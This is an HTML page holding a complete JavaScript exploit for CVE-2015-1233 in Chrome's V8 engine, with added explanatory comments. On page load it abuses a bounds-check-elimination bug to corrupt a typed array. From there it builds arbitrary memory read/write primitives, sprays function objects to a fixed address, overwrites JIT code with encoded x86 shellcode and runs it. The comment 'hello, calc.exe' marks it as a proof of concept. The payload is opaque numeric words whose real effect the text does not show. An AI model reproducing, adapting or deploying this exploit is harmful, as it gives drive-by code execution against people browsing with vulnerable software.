<html>
<TITLE>
CVE-2015-1233
</TITLE>
<META HTTP-EQUIV="pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-store, must-revalidate">
<META HTTP-EQUIV="expires" CONTENT="0">
<style>
div,h3
{
font-family: Courier
}
</style>
<body>
<div id="e_div"></div>
<script>
// Global-object alias used to pin references (attr0 is set in exploit()) so sprayed data is not collected early.
dontGC = this
dontGC.attr1 = {}
// Namespace for the memory primitives; filled in by init_exploit_bce().
exploit_bce = {}
// Debug switch: enables the alert below, the breakpoint() helper, the marker bytes in
// heap_fengshui, and the 0xCC-prefixed shellcode variant in exploit().
is_debug = false
// Heap-spray parameters consumed by exploit(): number of arrays and their byte size.
fixedarray_count = 0x2000
fixedarray_size = 0x10000 - 8
// Element count of one sprayed array; not referenced elsewhere in this file (exploit() recomputes fixedarray_size / 4 inline).
fixedarray_length = fixedarray_size / 4
// Marker stored at index 0 of every sprayed array (see exploit()).
FIXEDARRAY_TAG = 0x11223344
// Clears the low bit of a value read back from memory; presumably strips the engine's heap-object tag bit — confirm.
TAGGED_PTR_MASK = 0xFFFFFFFE
// NOTE(review): every binding above is an implicit global (no var/let); strict mode or an ES module would reject this file.
if(is_debug) alert("[+]attach me:)")
/*********************************************************
*functions used for debugging defined here
*********************************************************/
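function log(info)
{
  // Append one status line (an <h3>) to the #e_div element.
  // The text is set through textContent rather than innerHTML so the message is
  // rendered literally instead of being parsed as markup, and earlier lines are
  // not re-parsed on every call as `innerHTML +=` would do.
  var line = document.createElement("h3")
  line.textContent = info
  document.getElementById("e_div").appendChild(line)
}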
function breakpoint()
{
  // Debug aid only: when is_debug is set, call Math.atan2 with a single argument so a
  // debugger breakpoint placed on the engine's atan2 runtime entry
  // (chrome_child!v8::internal::Runtime_MathAtan2 per the original note) fires here.
  if (!is_debug) return
  Math.atan2(1)
}
function fail(reason)
{
  // Report a failed attempt on the page, then reload after a delay so the run is retried.
  // NOTE: this makes a consistently failing page reload itself indefinitely.
  var retryDelayMs = 10000
  log("[*]Exploit fail: " + reason)
  log("[*]Aw, Snap:( You'd better have a cup of tea and exploit me again.")
  setTimeout(function () { window.location.reload(true) }, retryDelayMs)
}
/*********************************************************
*functions used for V8 Heap Feng Shui defined here.
*********************************************************/
function gc(count)
{
  // Allocation churn intended to provoke a garbage-collection cycle.
  // `count` is accepted but unused: the loop always runs 0x100000 times.
  // `tmp` is deliberately left as the implicit global the rest of the file shares.
  tmp = []
  var allocated = 0
  while (allocated < 0x100000)
  {
    tmp.push(new Uint8Array(10))
    allocated++
  }
  tmp = null
}
/************************************************************
*function used for init object exploit_bce defined here.
*************************************************************/
function init_exploit_bce()
{
// Populates exploit_bce with the memory primitives used by exploit().
// Order of use: trigger_optimize -> heap_fengshui (gc, corrupt, search_arrbuffer_memptr)
// -> read_dword / write_dword.
// Byte length of the ArrayBuffer allocated in heap_fengshui; search_arrbuffer_memptr looks
// for this value doubled (presumably its tagged small-integer encoding — confirm).
exploit_bce.ARRBUFFER_LENGTH = 0x112233
// Sentinel meaning "backing-store pointer not located"; checked after the search.
exploit_bce.exploit_memptr_index = 0xBAD0BEEF
// Same as the top-level gc(): allocation churn to provoke a GC cycle. `tmp` is an implicit global.
exploit_bce.gc = function()
{
tmp = [];
for (var i = 0; i < 0x100000; i++)
tmp.push(new Uint8Array(10));
tmp = null;
}
// Three byte stores whose indices are expressed through large constants; arithmetically they
// fold to array[0x3F + offset], array[0x20 + offset] and array[offset]. With offset = 0
// (trigger_optimize) every store is in bounds; with offset = -2 (heap_fengshui) the last store
// lands before the array's data. The roundabout index form is presumably what the optimizer's
// bounds-check elimination mishandles once this function is hot-compiled — TODO confirm against
// the CVE-2015-1233 analysis.
exploit_bce.corrupt = function(array, offset, oob_byte)
{
var base = -0x7FFFFFC1 + offset;
array[base - (-0x80000000)] = 0x4B;
array[base + 0x7FFFFFE1] = 0x4B;
array[base + 0x7FFFFFC1] = oob_byte;
}
// Calls corrupt() one million times with in-bounds arguments so it is optimized before the
// out-of-bounds call in heap_fengshui.
exploit_bce.trigger_optimize = function ()
{
var array = new Uint8Array(0x40);
for (var i = 0; i < 1000000; i++) exploit_bce.corrupt(array, 0, 0x00);
}
// Scans exploit_array in 4-byte steps from 0x40 to 0x1000 (past its original 0x40 bytes, relying on
// the length overwrite done in heap_fengshui) for the dword ARRBUFFER_LENGTH * 2; the index of the
// dword immediately after it is recorded as the location of the ArrayBuffer's backing-store pointer.
// Precedence note on the first line of the loop: `x & 1 != 0` parses as `x & (1 != 0)`, i.e. `x & 1`,
// which happens to be the intended low-bit test.
exploit_bce.search_arrbuffer_memptr = function()
{
for(var i=0x40; i<0x1000; i+=4)
{
if(exploit_bce.exploit_array[i] & 1 != 0) continue
var dword = (exploit_bce.exploit_array[i + 3] << 24) + (exploit_bce.exploit_array[i + 2] << 16) + (exploit_bce.exploit_array[i + 1] << 8) + exploit_bce.exploit_array[i]
if(dword == exploit_bce.ARRBUFFER_LENGTH * 2)
{
exploit_bce.exploit_memptr_index = i + 4
break
}
}
// Sentinel still in place: the layout did not come out as expected. fail() reloads the page after 10 s.
if(exploit_bce.exploit_memptr_index == 0xBAD0BEEF)
{
fail("heap fengshui fail.")
return
}
}
// Sets up the corrupted typed array and locates the neighbouring ArrayBuffer:
//  1. allocate the 0x40-byte victim array (debug runs stamp its first bytes with "K__K" for spotting in a dump),
//  2. allocate the ArrayBuffer and a Uint8Array view over it,
//  3. gc() to clear the heap of garbage so the buffer lies within OOB reach (per the original comment),
//  4. corrupt() with offset -2 to write 0x80 before the victim's data (the original says this sets its length to 0x800080),
//  5. search for the ArrayBuffer's backing-store pointer through the now over-long victim array.
exploit_bce.heap_fengshui = function()
{
exploit_bce.exploit_array = new Uint8Array(0x40);
if(is_debug)
{
exploit_bce.exploit_array[0] = 0x4B
exploit_bce.exploit_array[1] = 0x5F
exploit_bce.exploit_array[2] = 0x5F
exploit_bce.exploit_array[3] = 0x4B
}
exploit_bce.exploit_arrbuf = new ArrayBuffer(exploit_bce.ARRBUFFER_LENGTH);
exploit_bce.exploit_rw_buf = new Uint8Array(exploit_bce.exploit_arrbuf);
/*remove garbage from heap, make sure ArrayBuffer's backstore pointer can be OOB accessed*/
exploit_bce.gc()
/*write the exploit_array's length to 0x800080*/
exploit_bce.corrupt(exploit_bce.exploit_array, -2, 0x80);
/*search the ArrayBuffer backsotre buffer pointer*/
exploit_bce.search_arrbuffer_memptr()
}
// Arbitrary 32-bit write: stores `address` little-endian over the ArrayBuffer's backing-store pointer
// (reached through exploit_array at exploit_memptr_index), then writes `dword` little-endian through
// the view at `offset`, i.e. to address + offset.
// NOTE(review): nothing restores the original pointer afterwards; the buffer stays retargeted.
exploit_bce.write_dword = function(address, offset, dword)
{
var addr_array = new Array(4)
addr_array[0] = address & 0xFF
addr_array[1] = (address >> 8) & 0xFF
addr_array[2] = (address >> 16) & 0xFF
addr_array[3] = (address >> 24) & 0xFF
for (var i = 0; i < addr_array.length; i++)
exploit_bce.exploit_array[exploit_bce.exploit_memptr_index + i] = addr_array[i];
exploit_bce.exploit_rw_buf[offset] = dword & 0xFF
exploit_bce.exploit_rw_buf[offset+1] = (dword >> 8) & 0xFF
exploit_bce.exploit_rw_buf[offset+2] = (dword >> 16) & 0xFF
exploit_bce.exploit_rw_buf[offset+3] = (dword >> 24) & 0xFF
}
// Arbitrary 32-bit read: same pointer overwrite as write_dword, then assembles the four bytes at
// `offset` little-endian. The `<< 24` term can make the result negative; callers mask or add to it.
exploit_bce.read_dword = function(address, offset)
{
var addr_array = new Array(4)
addr_array[0] = address & 0xFF
addr_array[1] = (address >> 8) & 0xFF
addr_array[2] = (address >> 16) & 0xFF
addr_array[3] = (address >> 24) & 0xFF
for (var i = 0; i < addr_array.length; i++)
exploit_bce.exploit_array[exploit_bce.exploit_memptr_index + i] = addr_array[i];
var byte0 = exploit_bce.exploit_rw_buf[offset]
var byte1 = exploit_bce.exploit_rw_buf[offset+1]
var byte2 = exploit_bce.exploit_rw_buf[offset+2]
var byte3 = exploit_bce.exploit_rw_buf[offset+3]
return ((byte3 << 24) + (byte2 << 16) + (byte1 << 8) + byte0)
}
}
function exploit()
{
// End-to-end chain: spray -> build primitives -> read function/JIT pointers -> overwrite JIT code -> call it.
// 1. Build a function with 0x10000 generated statements through new Function and run it once
//    (a large body, presumably so it gets its own code region — confirm). `tmp` is again an implicit global.
var code = "tmp = [];";
for (var i = 0; i < 0x10000; i++)
code += "tmp[" + i + "] = " + i + ";";
var func_obj = new Function("a", code);
func_obj();
/*
spray the func_obj to a predictable address such as 0x3ff10000
*/
// 2. Spray fixedarray_count arrays of fixedarray_size / 4 elements, alternating func_obj (even
//    indices) and 0x11111111 (odd indices), with FIXEDARRAY_TAG at index 0; pinned via dontGC.attr0.
var fixedarrays1 = []
for(var i=0; i<fixedarray_count; i++)
{
fixedarrays1[i] = new Array(fixedarray_size / 4)
for(var j=0; j<fixedarrays1[i].length; j++)
{
if((j+1) % 2 == 0)
{
fixedarrays1[i][j] = 0x11111111
}
else
{
fixedarrays1[i][j] = func_obj
}
}
fixedarrays1[i][0] = FIXEDARRAY_TAG
}
dontGC.attr0 = fixedarrays1
// 3. Warm up corrupt(), then set up the corrupted array and locate the ArrayBuffer pointer.
//    NOTE(review): heap_fengshui's failure path calls fail() and returns, but execution continues
//    here with the sentinel index, so the reads below run regardless.
exploit_bce.trigger_optimize()
exploit_bce.heap_fengshui()
// 4. Read the sprayed slot at 0x3ff10000 and clear the tag bit to get func_obj's address, then read
//    the dword at +0xC, which the original treats as the pointer to the function's JIT code.
var func_obj_ptr = exploit_bce.read_dword(0x3ff10000, 0) & TAGGED_PTR_MASK
var jited_code_ptr = exploit_bce.read_dword(func_obj_ptr + 0xC, 0)
/*write shellcode to jit code page with PAGE_EXECUTE_READWRITE*/
// 5. Payload as 32-bit little-endian words. The two variants differ only in the first word
//    (0xCCCCCCCC in debug runs, presumably so an attached debugger traps at entry — confirm).
//    `var shellcode` is hoisted, so declaring it in both branches is legal.
if(is_debug)
{
var shellcode = [0xCCCCCCCC, 0x9040ec83, 0x74d9dfdb, 0x2958f424, 0x37e8bec9, 0x32b1e38a, 0x31fce883, 0x98031370, 0xa4166824, 0x54d9e5a3, 0xb1509634, 0xb2078405, 0x96431834, 0x0201d3b4, 0x258d914e, 0x08e81ce7, 0xc63490f8, 0x14c8b23a, 0xd7f0146f, 0x05355562, 0x42ee078c, 0x169bb83f, 0x1d4bb9fc, 0xe1eec1bc, 0x31f07849, 0xa9baf7e1, 0xc81b5089, 0x8367835e, 0x121370eb, 0x25dc493a, 0x8ae30602, 0x2c23568f, 0x4f5f2d70, 0x32a4360d, 0x9439b3c9, 0x259a649a, 0x2969f24e, 0x2d35703b, 0x494d55ba, 0xd8825837, 0x81067f03, 0x6f1f1ed0, 0xd77f1fb6, 0xf50bba67, 0x9351bc7c, 0xdaec4c83, 0x4cef4e84, 0x03647fed, 0x60af806a, 0xc0f2ca84, 0x5166930d, 0x955d2450, 0x6554a76d, 0x601cb78a, 0x18cc7fd6, 0x8ff2ea47, 0x4e913f68, 0x4156a3fb]
}
else
{
var shellcode = [0x90909090, 0x9040ec83, 0x74d9dfdb, 0x2958f424, 0x37e8bec9, 0x32b1e38a, 0x31fce883, 0x98031370, 0xa4166824, 0x54d9e5a3, 0xb1509634, 0xb2078405, 0x96431834, 0x0201d3b4, 0x258d914e, 0x08e81ce7, 0xc63490f8, 0x14c8b23a, 0xd7f0146f, 0x05355562, 0x42ee078c, 0x169bb83f, 0x1d4bb9fc, 0xe1eec1bc, 0x31f07849, 0xa9baf7e1, 0xc81b5089, 0x8367835e, 0x121370eb, 0x25dc493a, 0x8ae30602, 0x2c23568f, 0x4f5f2d70, 0x32a4360d, 0x9439b3c9, 0x259a649a, 0x2969f24e, 0x2d35703b, 0x494d55ba, 0xd8825837, 0x81067f03, 0x6f1f1ed0, 0xd77f1fb6, 0xf50bba67, 0x9351bc7c, 0xdaec4c83, 0x4cef4e84, 0x03647fed, 0x60af806a, 0xc0f2ca84, 0x5166930d, 0x955d2450, 0x6554a76d, 0x601cb78a, 0x18cc7fd6, 0x8ff2ea47, 0x4e913f68, 0x4156a3fb]
}
// 6. Copy the words over the JIT code page, word by word, then call func_obj so the patched code runs.
//    This step depends on the code page being writable and executable at the same time (as the
//    original comment states); non-writable JIT code pages would stop it here.
for(var i=0; i<shellcode.length; i++)
{
exploit_bce.write_dword(jited_code_ptr, i*4, shellcode[i])
}
/*hello, calc.exe*/
func_obj()
// Explicit return with no value; redundant but harmless.
return
}
// Runs on page load with no user interaction: install the primitives, then start the chain.
init_exploit_bce()
exploit()
</script>
</body>
</html>